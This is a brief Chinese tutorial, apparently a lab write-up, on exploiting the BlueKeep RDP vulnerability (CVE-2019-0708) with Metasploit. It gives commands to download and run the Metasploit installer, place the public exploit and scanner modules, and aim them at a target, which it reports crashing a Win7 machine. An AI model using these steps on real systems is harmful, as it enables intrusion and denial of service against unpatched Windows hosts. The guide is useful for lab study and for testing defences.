首先更新msf,最新版本的msf更新后在/opt目录下
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
下载poc
这里给出poc地址:https://github.com/rapid7/metasploit-framework/pull/12283/files
将clone的文件放入msf相应目录
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
mv cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/
mv rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
mv rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
mv cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
重载msf
msfconsole 进入msf
reload_all 重载msf将poc加载
search 2019——0708 查找到poc,可以看到两个选项,第一个是检查目标主机是否存在该漏洞,第二个就是我们要用的poc了
然后查看被攻击主机的ip地址
然后按照图示操作检查被攻击主机是否存在该cve漏洞
返回下图说明存在
然后info查看相关信息
设置靶机IP,PORT,攻击选项
查看结果,可以看到win7被打蓝屏了